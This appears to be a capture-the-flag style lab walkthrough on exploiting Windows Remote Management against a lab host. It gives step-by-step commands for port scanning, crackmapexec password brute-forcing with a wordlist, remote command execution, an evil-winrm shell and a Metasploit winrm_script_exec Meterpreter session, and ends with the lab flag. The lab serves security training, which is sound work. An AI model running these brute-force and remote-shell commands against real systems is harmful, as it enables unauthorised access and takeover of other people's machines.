🏠 Home BlogGitHub📚 Buy Me a Book
Edit

🔬WinRM

Lab 1

🔬 WinRM: Exploitation with Metasploit

  • Target IP: 10.4.30.175

  • WinRM exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.30.175

nmap --top-ports 7000 10.4.30.175
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5985/tcp open  wsman
nmap -sV -p 5985 10.4.30.175
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
nmap

CrackMapExec Brute-force

  • Use crackmapexec tool to confirm WinRM is running on port 5985

crackmapexec
crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
crackmapexec WinRM

  • Execute specific Windows commands

crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"
crackmapexec WinRM

evil-WinRM Shell

  • Get a command shell session using evil-winrm tool

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175
evil-winrm

Meterpreter Session

msfconsole
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
Metasploit winrm_script_exec
Reveal Flag: 🚩

3c716f95616eec677a7078f92657a230

Previous🔬RDPNext🔬Win Kernel Privesc

Last updated

Was this helpful?